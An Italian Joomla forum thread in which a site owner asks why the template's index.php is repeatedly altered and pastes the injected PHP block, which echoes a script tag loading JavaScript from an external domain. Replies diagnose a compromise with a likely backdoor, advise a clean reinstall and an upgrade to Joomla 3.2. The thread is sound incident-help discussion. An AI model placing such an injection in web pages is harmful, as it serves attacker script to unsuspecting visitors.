Joomla.it Forum
Non solo Joomla... => Sicurezza => : zorzside 06 Nov 2013, 22:49:04
-
Ciao a tutti ho questo problema, joomla aggiornato alla versione 1.5.26, tutti i moduli inutili disabilitati, tutti i template sono stati rimossi è lasciato solo quello da me creato. iscrizione utenti disabilitata.
ho applicato la patch a file.php e a media.php successiva alla versione 1.5.26
ci sono installati solo joomfish e oizogallery2
Eppure all'interno del file index.php del template ogni 2-3 giorni mi trovo un iframe interno, che poi non fa comparire niente sul sito, ma mi sballa tutto il flow del sito.
Avete idee di come bloccare definitivamente questo problema?
Copio il codice che trovo all'interno del file index del template.
<?php
#339810#
if(empty($bsr)) {
$bsr = "<script src=\"http://astralight.com/moving.page/2ulYR1AB.php\" type=\"text/javascript\"></script>";
echo $bsr;
}
#/339810#
?>
function iFrameHeight() {
var h = 0;
if ( !document.all ) {
h = document.getElementById('blockrandom').contentDocument.height;
document.getElementById('blockrandom').style.height = h + 60 + 'px';
} else if( document.all ) {
h = document.frames('blockrandom').document.body.scrollHeight;
document.all.blockrandom.style.height = h + 20 + 'px';
}
}
-
ciao,
ci sono numerosi post in questa sezione per tali problemi, ti invito a leggerli.
in soldoni, la situazione è che, una volta che il sito è stato 'bucato', non ti puoi più fidare di niente che sia sul file system. è molto probabile che da qualche parte ci sia una shell o un cavallo di troia e l'unica soluzione è ripartire da un'installazione pulita salvando solo db ed immagini.
potrebbe essere una buona occasione per passare a J3.2
ciao,
marco
-
Ciao grazie, si ho letto un pò di altri post. un bel pò :)
pensavo di aver risolto definitivamente perchè da 1 attacco al giorno, ero arrivato a 1 solo a settimana.
ma penso anche io ci sia una bella backdoor.
per sicurezza cosa che mi ero dimenticato di fare ho cambiato password ftp.
ps:secondo te meglio una collaudata 2.5 lts o una 3.2 sts?
-
se non hai esigenze particolari che impongano la 2.5 direi la 3.2. il supporto 3.x si estenderà a tutto il 2016, mentre quello per la 2.5 terminerà l'anno prossimo.
per esigenze particolari intendo, principalmente, componenti che non esistono ancora per 3.x ma che sono in porting o che presumibilmente verranno migrati (es VM2), non su cose che non ci saranno mai.
ciao
-
ho solo joomfish e oizo gallery.
il sito è un mini sito con solo 5 pagine.
grazie ciao
-
oizo? se lo sa alexred ti stozza ;D ;D ;D
butta via joomfish e vai di J3.2!
ciao,
marco
-
oizo? se lo sa alexred ti stozza ;D ;D ;D
Abbiamo trovato il problema? :D :D :D più bucato di un colapasta?
-
no, non è bucato, è che il nome e 'ozio gallery' e non oizo come hai scritto tu.
questa gallery è l'orgoglio di alexred!! e, a dire il vero, anche io ho scritto degli algoritmi di lettura directories e generazione xml per questo componente.
ciao,
marco